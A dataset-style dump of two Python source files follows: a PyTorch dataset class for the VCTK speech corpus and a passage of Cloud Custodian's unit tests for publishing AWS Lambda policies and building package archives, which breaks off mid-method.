content stringlengths 5 1.05M |
|---|
import json
import torch
import pandas as pd
from os.path import join
from torch.utils.data import Dataset
class VCTKDataset(Dataset):
    """Dataset over VCTK wav files listed in a CSV partition table.

    Items are (file_path, speaker_id) pairs; when bucketing is enabled
    (train split only) each item is instead a list of batch_size pairs of
    similar duration.
    """

    def __init__(self, path, partition_table, split, bucketing, batch_size, spkr_map):
        """
        Args:
            path: root directory of VCTK (i.e. /yourPath/VCTK-Corpus)
            partition_table: CSV indexed by utterance name with columns
                speaker / split / duration
            split: one in ['train', 'dev', 'test']
            bucketing: group utterances of similar duration (train only)
            batch_size: bucket size used when bucketing is enabled
            spkr_map: path to a JSON file mapping speaker name -> integer id
        """
        # Setup
        self.path = path
        self.split = split
        self.batch_size = batch_size
        # Bucketing is only meaningful for training; dev/test are served one-by-one.
        self.bucketing = bucketing and (split not in ['dev', 'test'])
        self.bs_for_collate = 1 if self.bucketing else self.batch_size
        # Fixed: close the speaker-map file handle instead of leaking it.
        with open(spkr_map) as f:
            self.spkr_map = json.load(f)
        # Select split and sort by length (longest first).
        table = pd.read_csv(partition_table, index_col=0)
        table = table[table.split == split]
        if len(table) == 0:
            # Empty partition: keep a single placeholder row so __len__ == 1.
            # Fixed: DataFrame.append was removed in pandas 2.0; use pd.concat.
            placeholder = pd.DataFrame([{'speaker': 0, 'split': split, 'duration': 0}])
            self.table = pd.concat([table, placeholder], ignore_index=True)
        else:
            # row.name is the utterance id (the CSV index).
            table['file_path'] = table.apply(
                lambda row: join(path, row.speaker, row.name + '.wav'), axis=1)
            table['speaker'] = table.apply(
                lambda row: self.spkr_map[row.speaker], axis=1)
            table = table.sort_values('duration', axis=0, ascending=False)
            # The 'lj' speaker is excluded from the test split.
            self.table = table if split != 'test' else table[table.speaker != self.spkr_map['lj']]
        # Fixed: count the speakers in the loaded map — the original measured
        # the length of the spkr_map *file path* string.
        self.n_spkr = len(self.spkr_map)

    def get_statics(self):
        """One-line summary of the split: size, total duration (minutes,
        assuming 'duration' is seconds — TODO confirm), bucketing flag."""
        return ' | {} size = {}\t| Duration = {:.1f}\t| Bucketing = {} '\
            .format(self.split.replace('unpaired', 'unpair'), len(self.table),
                    self.table.duration.sum() / 60, self.bucketing)

    def __getitem__(self, index):
        if self.bucketing:
            # Return a bucket of batch_size consecutive (path, speaker) pairs;
            # clamp so the slice never runs off the end of the table.
            index = min(len(self.table) - self.batch_size, index)
            rows = self.table.iloc[index:index + self.batch_size]
            return list(zip(rows.file_path.tolist(), rows.speaker.tolist()))
        else:
            return self.table.iloc[index].file_path, self.table.iloc[index].speaker

    def __len__(self):
        return len(self.table)
|
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, timedelta
import importlib
import json
import logging
import os
import platform
import py_compile
import shutil
import site
import sys
import tempfile
import time
import unittest
import zipfile
import mock
from c7n.mu import (
custodian_archive,
generate_requirements,
LambdaFunction,
LambdaManager,
PolicyLambda,
PythonPackageArchive,
CloudWatchLogSubscription,
SNSSubscription,
SQSSubscription,
CloudWatchEventSource
)
from c7n.ufuncs import logsub
from .common import (
BaseTest, event_data, functional, Bag, ACCOUNT_ID)
from .data import helloworld
# IAM role assumed by every lambda published from these tests.
ROLE = "arn:aws:iam::644160558196:role/custodian-mu"
def test_generate_requirements():
    """generate_requirements resolves boto3's transitive deps, minus the ignored ones."""
    lines = generate_requirements(
        'boto3', ignore=('docutils', 's3transfer', 'six'))
    # Each line is "name==version"; only the names matter here.
    packages = [entry.split('==')[0] for entry in lines.split('\n')]
    assert set(packages) == set([
        'botocore', 'jmespath', 'urllib3', 'python-dateutil'])
class Publish(BaseTest):
    """Publishing LambdaFunctions built from in-memory archives, replayed
    against recorded AWS flight data."""

    def make_func(self, **kw):
        """Build a minimal LambdaFunction whose handler just prints a greeting;
        **kw overrides any of the default function settings."""
        func_data = dict(
            name="test-foo-bar",
            handler="index.handler",
            memory_size=128,
            timeout=3,
            role='custodian-mu',
            runtime="python2.7",
            description="test",
        )
        func_data.update(kw)
        archive = PythonPackageArchive()
        archive.add_contents(
            "index.py", """def handler(*a, **kw):\n    print("Greetings, program!")"""
        )
        archive.close()
        self.addCleanup(archive.remove)
        return LambdaFunction(func_data, archive)

    def test_publishes_a_lambda(self):
        """Publishing uploads the archive; CodeSize matches the recorded zip."""
        session_factory = self.replay_flight_data("test_publishes_a_lambda")
        mgr = LambdaManager(session_factory)
        func = self.make_func()
        self.addCleanup(mgr.remove, func)
        result = mgr.publish(func)
        self.assertEqual(result["CodeSize"], 169)

    def test_publish_a_lambda_with_layer_and_concurrency(self):
        """First publish applies layers + reserved concurrency; republishing
        without concurrency removes it while unchanged layers are untouched."""
        factory = self.replay_flight_data('test_lambda_layer_concurrent_publish')
        mgr = LambdaManager(factory)
        layers = ['arn:aws:lambda:us-east-1:644160558196:layer:CustodianLayer:2']
        func = self.make_func(
            concurrency=5,
            layers=layers)
        self.addCleanup(mgr.remove, func)
        result = mgr.publish(func)
        self.assertEqual(result['Layers'][0]['Arn'], layers[0])
        state = mgr.get(func.name)
        self.assertEqual(state['Concurrency']['ReservedConcurrentExecutions'], 5)
        func = self.make_func(layers=layers)
        output = self.capture_logging("custodian.serverless", level=logging.DEBUG)
        result = mgr.publish(func)
        self.assertEqual(result['Layers'][0]['Arn'], layers[0])
        lines = output.getvalue().strip().split("\n")
        # No layer-update log line expected, but concurrency removal is logged.
        self.assertFalse('Updating function: test-foo-bar config Layers' in lines)
        self.assertTrue('Removing function: test-foo-bar concurrency' in lines)

    def test_can_switch_runtimes(self):
        """Republishing with a different runtime updates the function config."""
        session_factory = self.replay_flight_data("test_can_switch_runtimes")
        func = self.make_func()
        mgr = LambdaManager(session_factory)
        self.addCleanup(mgr.remove, func)
        result = mgr.publish(func)
        self.assertEqual(result["Runtime"], "python2.7")
        func.func_data["runtime"] = "python3.6"
        result = mgr.publish(func)
        self.assertEqual(result["Runtime"], "python3.6")
class PolicyLambdaProvision(BaseTest):
    """Provisioning PolicyLambda functions for the various execution modes
    (config-rule, cloudtrail, phd, periodic, hub-action, instance-state),
    replayed against recorded AWS flight data."""

    role = "arn:aws:iam::644160558196:role/custodian-mu"

    def assert_items(self, result, expected):
        """Assert every key/value in expected appears with the same value in result."""
        for k, v in expected.items():
            self.assertEqual(v, result[k])

    def test_config_rule_provision(self):
        """Publishing a config-rule mode policy creates custodian-<policy-name>."""
        session_factory = self.replay_flight_data("test_config_rule")
        p = self.load_policy(
            {
                "resource": "security-group",
                "name": "sg-modified",
                "mode": {"type": "config-rule"},
            },
            session_factory=session_factory
        )
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        result = mgr.publish(pl, "Dev", role=ROLE)
        self.assertEqual(result["FunctionName"], "custodian-sg-modified")
        self.addCleanup(mgr.remove, pl)

    def test_config_rule_evaluation(self):
        """Running a config-rule event through the execution mode yields the
        single matching instance."""
        session_factory = self.replay_flight_data("test_config_rule_evaluate")
        p = self.load_policy(
            {
                "resource": "ec2",
                "name": "ec2-modified",
                "mode": {"type": "config-rule"},
                "filters": [{"InstanceId": "i-094bc87c84d56c589"}],
            },
            session_factory=session_factory,
        )
        mode = p.get_execution_mode()
        event = event_data("event-config-rule-instance.json")
        resources = mode.run(event, None)
        self.assertEqual(len(resources), 1)

    def test_phd_account_mode(self):
        """phd mode on the account resource resolves the health event and
        annotates the account resource with it."""
        factory = self.replay_flight_data('test_phd_event_mode')
        p = self.load_policy(
            {'name': 'ec2-retire',
             'resource': 'account',
             'mode': {
                 'categories': ['scheduledChange'],
                 'events': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED'],
                 'type': 'phd'}}, session_factory=factory)
        mode = p.get_execution_mode()
        event = event_data('event-phd-ec2-retire.json')
        resources = mode.run(event, None)
        self.assertEqual(len(resources), 1)
        self.assertTrue('c7n:HealthEvent' in resources[0])

    def test_phd_mode(self):
        """phd mode on ec2 matches the affected instance, and the provisioned
        event source renders the expected aws.health event pattern."""
        factory = self.replay_flight_data('test_phd_event_mode')
        p = self.load_policy(
            {'name': 'ec2-retire',
             'resource': 'ec2',
             'mode': {
                 'categories': ['scheduledChange'],
                 'events': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED'],
                 'type': 'phd'}}, session_factory=factory)
        mode = p.get_execution_mode()
        event = event_data('event-phd-ec2-retire.json')
        resources = mode.run(event, None)
        self.assertEqual(len(resources), 1)
        p_lambda = PolicyLambda(p)
        events = p_lambda.get_events(factory)
        self.assertEqual(
            json.loads(events[0].render_event_pattern()),
            {'detail': {
                'eventTypeCategory': ['scheduledChange'],
                'eventTypeCode': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED']},
             'source': ['aws.health']}
        )

    def test_cwl_subscriber(self):
        """Publishing a log-subscription function wires a subscription filter
        on the log group pointing at the new lambda."""
        self.patch(CloudWatchLogSubscription, "iam_delay", 0.01)
        session_factory = self.replay_flight_data("test_cwl_subscriber")
        session = session_factory()
        client = session.client("logs")
        lname = "custodian-test-log-sub"
        self.addCleanup(client.delete_log_group, logGroupName=lname)
        client.create_log_group(logGroupName=lname)
        linfo = client.describe_log_groups(logGroupNamePrefix=lname)["logGroups"][0]
        params = dict(
            session_factory=session_factory,
            name="c7n-log-sub",
            role=ROLE,
            sns_topic="arn:",
            log_groups=[linfo],
        )
        func = logsub.get_function(**params)
        manager = LambdaManager(session_factory)
        finfo = manager.publish(func)
        self.addCleanup(manager.remove, func)
        results = client.describe_subscription_filters(logGroupName=lname)
        self.assertEqual(len(results["subscriptionFilters"]), 1)
        self.assertEqual(
            results["subscriptionFilters"][0]["destinationArn"], finfo["FunctionArn"]
        )
        # try and update
        # params['sns_topic'] = "arn:123"
        # manager.publish(func)

    @functional
    def test_sqs_subscriber(self):
        """End-to-end: a queue-subscribed lambda receives a sent message and
        logs the SQS record payload."""
        session_factory = self.replay_flight_data('test_mu_sqs_subscriber')
        func_name = 'c7n-hello-sqs'
        queue_name = "my-dev-test-3"
        # Setup Queues
        session = session_factory()
        client = session.client('sqs')
        queue_url = client.create_queue(QueueName=queue_name).get('QueueUrl')
        queue_arn = client.get_queue_attributes(
            QueueUrl=queue_url,
            AttributeNames=['QueueArn'])['Attributes']['QueueArn']
        self.addCleanup(client.delete_queue, QueueUrl=queue_url)
        # Setup Function
        params = dict(
            session_factory=session_factory,
            name=func_name,
            role="arn:aws:iam::644160558196:role/custodian-mu",
            events=[SQSSubscription(session_factory, [queue_arn])])
        func = helloworld.get_function(**params)
        manager = LambdaManager(session_factory)
        manager.publish(func)
        self.addCleanup(manager.remove, func)
        # Send and Receive Check
        client.send_message(
            QueueUrl=queue_url, MessageBody=json.dumps({'jurassic': 'block'}))
        if self.recording:
            # Only sleep when recording live; replays don't need the delay.
            time.sleep(60)
        log_events = list(manager.logs(func, "1970-1-1 UTC", "2037-1-1"))
        messages = [
            e["message"] for e in log_events if e["message"].startswith('{"Records')
        ]
        self.addCleanup(
            session.client("logs").delete_log_group,
            logGroupName="/aws/lambda/%s" % func_name)
        self.assertIn(
            'jurassic',
            json.loads(messages[0])["Records"][0]["body"])

    @functional
    def test_sns_subscriber_and_ipaddress(self):
        """End-to-end: an SNS-subscribed lambda receives a published message
        and logs the SNS record payload."""
        self.patch(SNSSubscription, "iam_delay", 0.01)
        session_factory = self.replay_flight_data("test_sns_subscriber_and_ipaddress")
        session = session_factory()
        client = session.client("sns")
        # create an sns topic
        tname = "custodian-test-sns-sub"
        topic_arn = client.create_topic(Name=tname)["TopicArn"]
        self.addCleanup(client.delete_topic, TopicArn=topic_arn)
        # provision a lambda via mu
        params = dict(
            session_factory=session_factory,
            name="c7n-hello-world",
            role="arn:aws:iam::644160558196:role/custodian-mu",
            events=[SNSSubscription(session_factory, [topic_arn])],
        )
        func = helloworld.get_function(**params)
        manager = LambdaManager(session_factory)
        manager.publish(func)
        self.addCleanup(manager.remove, func)
        # now publish to the topic and look for lambda log output
        client.publish(TopicArn=topic_arn, Message="Greetings, program!")
        if self.recording:
            time.sleep(30)
        log_events = manager.logs(func, "1970-1-1 UTC", "2037-1-1")
        messages = [
            e["message"] for e in log_events if e["message"].startswith('{"Records')
        ]
        self.addCleanup(
            session.client("logs").delete_log_group,
            logGroupName="/aws/lambda/c7n-hello-world",
        )
        self.assertEqual(
            json.loads(messages[0])["Records"][0]["Sns"]["Message"],
            "Greetings, program!",
        )

    def test_cwe_update_config_and_code(self):
        """Republishing with changed mode config updates both code and
        function configuration (MemorySize) in place."""
        # Originally this was testing the no update case.. but
        # That is tricky to record, any updates to the code end up
        # causing issues due to checksum mismatches which imply updating
        # the function code / which invalidate the recorded data and
        # the focus of the test.
        session_factory = self.replay_flight_data("test_cwe_update", zdata=True)
        p = self.load_policy({
            "resource": "s3",
            "name": "s3-bucket-policy",
            "mode": {"type": "cloudtrail",
                     "events": ["CreateBucket"], 'runtime': 'python2.7'},
            "filters": [
                {"type": "missing-policy-statement",
                 "statement_ids": ["RequireEncryptedPutObject"]},
            ],
            "actions": ["no-op"],
        })
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        result = mgr.publish(pl, "Dev", role=ROLE)
        self.addCleanup(mgr.remove, pl)
        p = self.load_policy(
            {
                "resource": "s3",
                "name": "s3-bucket-policy",
                "mode": {
                    "type": "cloudtrail",
                    "memory": 256,
                    'runtime': 'python2.7',
                    "events": [
                        "CreateBucket",
                        {
                            "event": "PutBucketPolicy",
                            "ids": "requestParameters.bucketName",
                            "source": "s3.amazonaws.com",
                        },
                    ],
                },
                "filters": [
                    {
                        "type": "missing-policy-statement",
                        "statement_ids": ["RequireEncryptedPutObject"],
                    }
                ],
                "actions": ["no-op"],
            },
        )
        output = self.capture_logging("custodian.serverless", level=logging.DEBUG)
        result2 = mgr.publish(PolicyLambda(p), "Dev", role=ROLE)
        lines = output.getvalue().strip().split("\n")
        self.assertTrue("Updating function custodian-s3-bucket-policy code" in lines)
        self.assertTrue(
            "Updating function: custodian-s3-bucket-policy config MemorySize" in lines)
        self.assertEqual(result["FunctionName"], result2["FunctionName"])
        # drive by coverage
        functions = [
            i
            for i in mgr.list_functions()
            if i["FunctionName"] == "custodian-s3-bucket-policy"
        ]
        # NOTE(review): assertTrue(len(functions), 1) treats the 1 as the msg
        # argument and passes for any non-empty list; assertEqual was likely
        # intended here — confirm before changing recorded-test behavior.
        self.assertTrue(len(functions), 1)
        start = 0
        end = time.time() * 1000
        self.assertEqual(list(mgr.logs(pl, start, end)), [])

    def test_cwe_trail(self):
        """cloudtrail mode renders the expected CloudWatch event pattern and
        publishes with the default function configuration."""
        session_factory = self.replay_flight_data("test_cwe_trail", zdata=True)
        p = self.load_policy({
            "resource": "s3",
            "name": "s3-bucket-policy",
            "mode": {"type": "cloudtrail", "events": ["CreateBucket"]},
            "filters": [
                {
                    "type": "missing-policy-statement",
                    "statement_ids": ["RequireEncryptedPutObject"],
                }
            ],
            "actions": ["no-op"]},
            session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        self.addCleanup(mgr.remove, pl)
        result = mgr.publish(pl, "Dev", role=ROLE)
        events = pl.get_events(session_factory)
        self.assertEqual(len(events), 1)
        event = events.pop()
        self.assertEqual(
            json.loads(event.render_event_pattern()),
            {
                u"detail": {
                    u"eventName": [u"CreateBucket"],
                    u"eventSource": [u"s3.amazonaws.com"],
                },
                u"detail-type": ["AWS API Call via CloudTrail"],
            },
        )
        self.assert_items(
            result,
            {
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-s3-bucket-policy",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
            },
        )

    def test_mu_metrics(self):
        """Metrics for a just-provisioned lambda come back empty."""
        session_factory = self.replay_flight_data("test_mu_metrics")
        p = self.load_policy(
            {
                "name": "s3-bucket-policy",
                "resource": "s3",
                "mode": {"type": "cloudtrail", "events": ["CreateBucket"]},
                "actions": ["no-op"],
            }, session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        end = datetime.utcnow()
        start = end - timedelta(1)
        results = mgr.metrics([pl], start, end, 3600)
        self.assertEqual(
            results,
            [{"Durations": [], "Errors": [], "Throttles": [], "Invocations": []}],
        )

    def test_cwe_instance(self):
        """ec2-instance-state mode provisions an enabled rule matching the
        requested instance states."""
        session_factory = self.replay_flight_data("test_cwe_instance", zdata=True)
        p = self.load_policy({
            "resource": "s3",
            "name": "ec2-encrypted-vol",
            "mode": {"type": "ec2-instance-state", "events": ["pending"]}},
            session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        self.addCleanup(mgr.remove, pl)
        result = mgr.publish(pl, "Dev", role=ROLE)
        self.assert_items(
            result,
            {
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-ec2-encrypted-vol",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
            },
        )
        events = session_factory().client("events")
        result = events.list_rules(NamePrefix="custodian-ec2-encrypted-vol")
        self.assert_items(
            result["Rules"][0],
            {"State": "ENABLED", "Name": "custodian-ec2-encrypted-vol"},
        )
        self.assertEqual(
            json.loads(result["Rules"][0]["EventPattern"]),
            {
                "source": ["aws.ec2"],
                "detail": {"state": ["pending"]},
                "detail-type": ["EC2 Instance State-change Notification"],
            },
        )

    def test_cwe_asg_instance(self):
        """asg-instance-state mode provisions a rule on aws.autoscaling
        launch-failure notifications."""
        session_factory = self.replay_flight_data("test_cwe_asg", zdata=True)
        p = self.load_policy(
            {
                "resource": "asg",
                "name": "asg-spin-detector",
                "mode": {"type": "asg-instance-state", "events": ["launch-failure"]},
            }, session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        self.addCleanup(mgr.remove, pl)
        result = mgr.publish(pl, "Dev", role=ROLE)
        self.assert_items(
            result,
            {
                "FunctionName": "custodian-asg-spin-detector",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
            },
        )
        events = session_factory().client("events")
        result = events.list_rules(NamePrefix="custodian-asg-spin-detector")
        self.assert_items(
            result["Rules"][0],
            {"State": "ENABLED", "Name": "custodian-asg-spin-detector"},
        )
        self.assertEqual(
            json.loads(result["Rules"][0]["EventPattern"]),
            {
                "source": ["aws.autoscaling"],
                "detail-type": ["EC2 Instance Launch Unsuccessful"],
            },
        )

    def test_cwe_security_hub_action(self):
        """hub-action mode renders the custom-action event pattern, and the
        SecurityHub action source supports get/add/update/remove (CWE side
        mocked out)."""
        factory = self.replay_flight_data('test_mu_cwe_sechub_action')
        p = self.load_policy({
            'name': 'sechub',
            'resource': 'account',
            'mode': {
                'type': 'hub-action'}},
            session_factory=factory,
            config={'account_id': ACCOUNT_ID})
        mu_policy = PolicyLambda(p)
        events = mu_policy.get_events(factory)
        self.assertEqual(len(events), 1)
        hub_action = events.pop()
        self.assertEqual(
            json.loads(hub_action.cwe.render_event_pattern()),
            {'resources': [
                'arn:aws:securityhub:us-east-1:644160558196:action/custom/sechub'],
             'source': ['aws.securityhub'],
             'detail-type': [
                 'Security Hub Findings - Custom Action', 'Security Hub Insight Results'
             ]})
        # Swap the real CWE source for a mock so only the hub-action half runs.
        hub_action.cwe = cwe = mock.Mock(CloudWatchEventSource)
        cwe.get.return_value = False
        cwe.update.return_value = True
        cwe.add.return_value = True
        self.assertEqual(repr(hub_action), "<SecurityHub Action sechub>")
        self.assertEqual(
            hub_action._get_arn(),
            "arn:aws:securityhub:us-east-1:644160558196:action/custom/sechub")
        self.assertEqual(
            hub_action.get(mu_policy.name), {'event': False, 'action': None})
        hub_action.add(mu_policy)
        self.assertEqual(
            {'event': False,
             'action': {
                 'ActionTargetArn': ('arn:aws:securityhub:us-east-1:'
                                     '644160558196:action/custom/sechub'),
                 'Name': 'Account sechub', 'Description': 'sechub'}},
            hub_action.get(mu_policy.name))
        hub_action.update(mu_policy)
        hub_action.remove(mu_policy)
        self.assertEqual(
            hub_action.get(mu_policy.name),
            {'event': False, 'action': None})

    def test_cwe_schedule(self):
        """periodic mode provisions an enabled rule with the schedule expression."""
        session_factory = self.replay_flight_data("test_cwe_schedule", zdata=True)
        p = self.load_policy(
            {
                "resource": "ec2",
                "name": "periodic-ec2-checker",
                "mode": {"type": "periodic", "schedule": "rate(1 day)"},
            }, session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)
        self.addCleanup(mgr.remove, pl)
        result = mgr.publish(pl, "Dev", role=ROLE)
        self.assert_items(
            result,
            {
                "FunctionName": "custodian-periodic-ec2-checker",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
            },
        )
        events = session_factory().client("events")
        result = events.list_rules(NamePrefix="custodian-periodic-ec2-checker")
        self.assert_items(
            result["Rules"][0],
            {
                "State": "ENABLED",
                "ScheduleExpression": "rate(1 day)",
                "Name": "custodian-periodic-ec2-checker",
            },
        )

    # Fixtures shared by the config-coverage tests below (note the implicit
    # string concatenation in key_arn).
    key_arn = "arn:aws:kms:us-west-2:644160558196:key/" "44d25a5c-7efa-44ed-8436-b9511ea921b3"
    sns_arn = "arn:aws:sns:us-west-2:644160558196:config-topic"

    def create_a_lambda(self, flight, **extra):
        """Publish a config-rule hello-world policy lambda; returns (mgr, publish result)."""
        session_factory = self.replay_flight_data(flight, zdata=True)
        mode = {
            "type": "config-rule", "role": "arn:aws:iam::644160558196:role/custodian-mu"
        }
        mode.update(extra)
        p = self.load_policy({
            "resource": "s3",
            "name": "hello-world",
            "actions": ["no-op"],
            "mode": mode},
            session_factory=session_factory)
        pl = PolicyLambda(p)
        mgr = LambdaManager(session_factory)

        def cleanup():
            # Removal also sleeps while recording so AWS settles between runs.
            mgr.remove(pl)
            if self.recording:
                time.sleep(60)

        self.addCleanup(cleanup)
        return mgr, mgr.publish(pl)

    def create_a_lambda_with_lots_of_config(self, flight):
        """Variant of create_a_lambda exercising env/kms/dlq/tracing/tags config."""
        extra = {
            "environment": {"Variables": {"FOO": "bar"}},
            "kms_key_arn": self.key_arn,
            "dead_letter_config": {"TargetArn": self.sns_arn},
            "tracing_config": {"Mode": "Active"},
            "tags": {"Foo": "Bar"},
        }
        return self.create_a_lambda(flight, **extra)

    def update_a_lambda(self, mgr, **config):
        """Republish the hello-world policy with overridden mode config."""
        mode = {
            "type": "config-rule", "role": "arn:aws:iam::644160558196:role/custodian-mu"
        }
        mode.update(config)
        p = self.load_policy({
            "resource": "s3",
            "name": "hello-world",
            "actions": ["no-op"],
            "mode": mode,
        })
        pl = PolicyLambda(p)
        return mgr.publish(pl)

    def test_config_coverage_for_lambda_creation(self):
        """All optional config knobs survive initial creation, tags included."""
        mgr, result = self.create_a_lambda_with_lots_of_config(
            "test_config_coverage_for_lambda_creation"
        )
        self.assert_items(
            result,
            {
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-hello-world",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
                "DeadLetterConfig": {"TargetArn": self.sns_arn},
                "Environment": {"Variables": {"FOO": "bar"}},
                "KMSKeyArn": self.key_arn,
                "TracingConfig": {"Mode": "Active"},
            },
        )
        tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
        self.assert_items(tags, {"Foo": "Bar"})

    def test_config_coverage_for_lambda_update_from_plain(self):
        """Updating a plain lambda applies newly added optional config."""
        mgr, result = self.create_a_lambda(
            "test_config_coverage_for_lambda_update_from_plain"
        )
        result = self.update_a_lambda(
            mgr,
            **{
                "environment": {"Variables": {"FOO": "bloo"}},
                "kms_key_arn": self.key_arn,
                "dead_letter_config": {"TargetArn": self.sns_arn},
                "tracing_config": {"Mode": "Active"},
                "tags": {"Foo": "Bloo"},
            }
        )
        self.assert_items(
            result,
            {
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-hello-world",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python2.7",
                "Timeout": 60,
                "DeadLetterConfig": {"TargetArn": self.sns_arn},
                "Environment": {"Variables": {"FOO": "bloo"}},
                "TracingConfig": {"Mode": "Active"},
            },
        )
        tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
        self.assert_items(tags, {"Foo": "Bloo"})

    def test_config_coverage_for_lambda_update_from_complex(self):
        """Updating a fully-configured lambda changes runtime/env/tags while
        the emptied kms/dlq/tracing fields retain their prior values."""
        mgr, result = self.create_a_lambda_with_lots_of_config(
            "test_config_coverage_for_lambda_update_from_complex"
        )
        result = self.update_a_lambda(
            mgr,
            **{
                "runtime": "python3.6",
                "environment": {"Variables": {"FOO": "baz"}},
                "kms_key_arn": "",
                "dead_letter_config": {},
                "tracing_config": {},
                "tags": {"Foo": "Baz", "Bah": "Bug"},
            }
        )
        self.assert_items(
            result,
            {
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-hello-world",
                "Handler": "custodian_policy.run",
                "MemorySize": 512,
                "Runtime": "python3.6",
                "Timeout": 60,
                "DeadLetterConfig": {"TargetArn": self.sns_arn},
                "Environment": {"Variables": {"FOO": "baz"}},
                "TracingConfig": {"Mode": "Active"},
            },
        )
        tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
        self.assert_items(tags, {"Foo": "Baz", "Bah": "Bug"})

    def test_optional_packages(self):
        """mode.packages bundles the named package into the policy archive."""
        data = {
            "name": "s3-lambda-extra",
            "resource": "s3",
            "mode": {
                "type": "cloudtrail",
                "packages": ["boto3"],
                "events": ["CreateBucket"],
            },
        }
        p = self.load_policy(data)
        pl = PolicyLambda(p)
        pl.archive.close()
        self.assertTrue("boto3/utils.py" in pl.archive.get_filenames())

    def test_delta_config_diff(self):
        """delta_function ignores ordering and empty-value defaults, but
        flags genuine config differences."""
        delta = LambdaManager.delta_function
        # Same VPC config, different ordering: no delta.
        self.assertFalse(
            delta(
                {
                    "VpcConfig": {
                        "SubnetIds": ["s-1", "s-2"],
                        "SecurityGroupIds": ["sg-1", "sg-2"],
                    }
                },
                {
                    "VpcConfig": {
                        "SubnetIds": ["s-2", "s-1"],
                        "SecurityGroupIds": ["sg-2", "sg-1"],
                    }
                },
            )
        )
        # A genuinely different security group: delta.
        self.assertTrue(
            delta(
                {
                    "VpcConfig": {
                        "SubnetIds": ["s-1", "s-2"],
                        "SecurityGroupIds": ["sg-1", "sg-2"],
                    }
                },
                {
                    "VpcConfig": {
                        "SubnetIds": ["s-2", "s-1"],
                        "SecurityGroupIds": ["sg-3", "sg-1"],
                    }
                },
            )
        )
        # Empty/default values are not treated as changes.
        self.assertFalse(delta({}, {"DeadLetterConfig": {}}))
        self.assertTrue(delta({}, {"DeadLetterConfig": {"TargetArn": "arn"}}))
        self.assertFalse(delta({}, {"Environment": {"Variables": {}}}))
        self.assertTrue(delta({}, {"Environment": {"Variables": {"k": "v"}}}))
        self.assertFalse(delta({}, {"KMSKeyArn": ""}))
        self.assertFalse(
            delta({}, {"VpcConfig": {"SecurityGroupIds": [], "SubnetIds": []}})
        )

    def test_config_defaults(self):
        """A bare mode dict expands to the documented default function config."""
        p = PolicyLambda(Bag({"name": "hello", "data": {"mode": {}}}))
        self.maxDiff = None
        self.assertEqual(
            p.get_config(),
            {
                "DeadLetterConfig": {},
                "Description": "cloud-custodian lambda policy",
                "FunctionName": "custodian-hello",
                "Handler": "custodian_policy.run",
                "KMSKeyArn": "",
                "MemorySize": 512,
                "Role": "",
                "Runtime": "python3.8",
                "Tags": {},
                "Timeout": 900,
                "TracingConfig": {"Mode": "PassThrough"},
                "VpcConfig": {"SecurityGroupIds": [], "SubnetIds": []},
            },
        )
class PythonArchiveTest(unittest.TestCase):
    """Building PythonPackageArchive zips from modules, files, and strings."""

    def make_archive(self, modules=(), cache_file=None):
        """Build and close an archive over *modules*; removal runs at teardown."""
        archive = self.make_open_archive(modules, cache_file=cache_file)
        archive.close()
        return archive

    def make_open_archive(self, modules=(), cache_file=None):
        """Build an archive but leave it open so more entries can be added."""
        archive = PythonPackageArchive(modules=modules, cache_file=cache_file)
        self.addCleanup(archive.remove)
        return archive

    def get_filenames(self, modules=()):
        """Entry names of a closed archive built over *modules*."""
        return self.make_archive(modules).get_filenames()

    def test_handles_stdlib_modules(self):
        """Single-file stdlib modules are added by filename."""
        filenames = self.get_filenames(["webbrowser"])
        self.assertTrue("webbrowser.py" in filenames)

    def test_handles_third_party_modules(self):
        """Installed third-party packages are added with their package path."""
        filenames = self.get_filenames(["botocore"])
        self.assertTrue("botocore/__init__.py" in filenames)

    def test_handles_packages(self):
        """Packages are added recursively, including subpackages."""
        filenames = self.get_filenames(["c7n"])
        self.assertTrue("c7n/__init__.py" in filenames)
        self.assertTrue("c7n/resources/s3.py" in filenames)
        self.assertTrue("c7n/ufuncs/s3crypt.py" in filenames)

    def _install_namespace_package(self, tmp_sitedir):
        # Install our test namespace package in such a way that both py27 and
        # py36 can find it.
        from setuptools import namespaces
        installer = namespaces.Installer()

        class Distribution:
            namespace_packages = ["namespace_package"]

        installer.distribution = Distribution()
        installer.target = os.path.join(tmp_sitedir, "namespace_package.pth")
        installer.outputs = []
        installer.dry_run = False
